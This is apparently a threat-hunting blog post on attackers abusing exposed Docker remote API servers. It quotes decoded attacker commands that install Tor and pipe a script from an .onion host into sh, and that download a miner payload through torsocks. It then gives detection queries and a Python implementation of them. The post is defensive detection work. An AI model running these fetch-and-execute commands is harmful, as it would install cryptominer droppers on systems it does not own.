173. Adversaries Abuse Docker Remote API Servers and Tor Network

Hello everyone!

We are talking a lot about Windows threats, but let's look at Linux and containers today, as these are common targets of those involved in cryptominer distribution.

According to this report by Trend Micro, the threat actors abused a Docker remote API server to create a new container. The following base64-encoded command (shown here decoded) was executed:

apk update && apk add curl tor && tor & while ! curl -fs --proxy socks5h://localhost:9050 https://checkip [.]amazonaws.com; do sleep 10; done; curl -fs --proxy socks5h://localhost:9050 http[:]//wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/static/docker-init.sh | sh

Despite the fact it was executed in the adversary-created container, it's good to have relevant detections. For example, abusing apk to set up Tor:

event_type: "processcreatenix"

AND

proc_file_name: "apk"

AND

cmdline: "add" AND "tor"

One more thing - using cURL over Tor:

event_type: "processcreatenix"

AND

proc_file_name: "curl"

AND

cmdline: ("proxy" AND "socks5h" AND "9050")

Also, the threat actors used torsocks to route traffic through the Tor network and downloaded a Zstandard-compressed (.zst) payload:

torsocks wget -O /tmp/system.zst "http://2h573qd[.]onion:9000/binary/system-linux-$( uname -m).zst"

Here, for example, we can hunt for torsocks abuse to run wget or curl:

event_type: "processcreatenix"

AND

proc_file_name: "torsocks"

AND

cmdline: ("wget" OR "curl")
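As an added example that is not part of the original post or the Trend Micro report, here are the three hunting queries above expressed as Python functions and run over a handful of constructed Linux process-creation events. The field names (event_type, proc_file_name, cmdline) are the ones the queries use; the event records, the placeholder .onion host and the whole-token matching scheme are assumptions, not anything the page or a specific EDR product defines.

```python
import re

# Constructed sample process-creation events (not real telemetry). Field names
# follow the queries in the post: event_type, proc_file_name, cmdline.
SAMPLE_EVENTS = [
    {"event_type": "processcreatenix", "proc_file_name": "apk",
     "cmdline": "apk add curl tor"},
    {"event_type": "processcreatenix", "proc_file_name": "curl",
     "cmdline": "curl -fs --proxy socks5h://localhost:9050 https://checkip.amazonaws.com"},
    {"event_type": "processcreatenix", "proc_file_name": "torsocks",
     "cmdline": "torsocks wget -O /tmp/system.zst "
                "http://placeholder.onion:9000/binary/system-linux-x86_64.zst"},
    # Benign-looking events that must not fire: apk without tor, curl without a
    # Tor proxy, and a torsocks line from a non-process-creation event type.
    {"event_type": "processcreatenix", "proc_file_name": "apk",
     "cmdline": "apk add curl"},
    {"event_type": "processcreatenix", "proc_file_name": "curl",
     "cmdline": "curl -fs https://example.com/health"},
    {"event_type": "filecreate", "proc_file_name": "torsocks",
     "cmdline": "torsocks wget http://placeholder.onion/x"},
]


def cmdline_tokens(cmdline):
    """Split a command line into lower-case alphanumeric tokens, so that
    '--proxy socks5h://localhost:9050' yields proxy, socks5h, localhost, 9050.
    Whole-token matching (not substring matching) keeps 'tor' from matching
    'torsocks' or 'tor-browser', which mimics a tokenised full-text search."""
    return set(re.findall(r"[a-z0-9]+", cmdline.lower()))


def is_linux_process_create(ev):
    return ev.get("event_type") == "processcreatenix"


def rule_apk_installs_tor(ev):
    # event_type: "processcreatenix" AND proc_file_name: "apk"
    # AND cmdline: "add" AND "tor"
    t = cmdline_tokens(ev.get("cmdline", ""))
    return (is_linux_process_create(ev)
            and ev.get("proc_file_name") == "apk"
            and {"add", "tor"} <= t)


def rule_curl_over_tor(ev):
    # event_type: "processcreatenix" AND proc_file_name: "curl"
    # AND cmdline: ("proxy" AND "socks5h" AND "9050")
    t = cmdline_tokens(ev.get("cmdline", ""))
    return (is_linux_process_create(ev)
            and ev.get("proc_file_name") == "curl"
            and {"proxy", "socks5h", "9050"} <= t)


def rule_torsocks_downloader(ev):
    # event_type: "processcreatenix" AND proc_file_name: "torsocks"
    # AND cmdline: ("wget" OR "curl")
    t = cmdline_tokens(ev.get("cmdline", ""))
    return (is_linux_process_create(ev)
            and ev.get("proc_file_name") == "torsocks"
            and bool(t & {"wget", "curl"}))


RULES = {
    "apk_installs_tor": rule_apk_installs_tor,
    "curl_over_tor": rule_curl_over_tor,
    "torsocks_downloader": rule_torsocks_downloader,
}


def run_rules(events, rules=RULES):
    """Return (rule_name, event_index) for every rule that fires on every event."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in rules.items():
            if rule(ev):
                hits.append((name, i))
    return hits


if __name__ == "__main__":
    for name, i in run_rules(SAMPLE_EVENTS):
        print(f"{name}: {SAMPLE_EVENTS[i]['cmdline']}")
```

Two things worth noting when porting this to a real query language: the queries as written only fire when the `apk`, `curl` or `torsocks` binary itself is the created process, so a one-liner run through `sh -c` (as in the decoded command above) produces a child process per tool and is still caught, but the parent `sh` event alone is not; and whole-token matching on "tor" will not match `apk add torsocks`, so a broader rule may want to list both package names.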

The payload is a dropper for the XMRig cryptocurrency miner! That's it!

See you tomorrow!
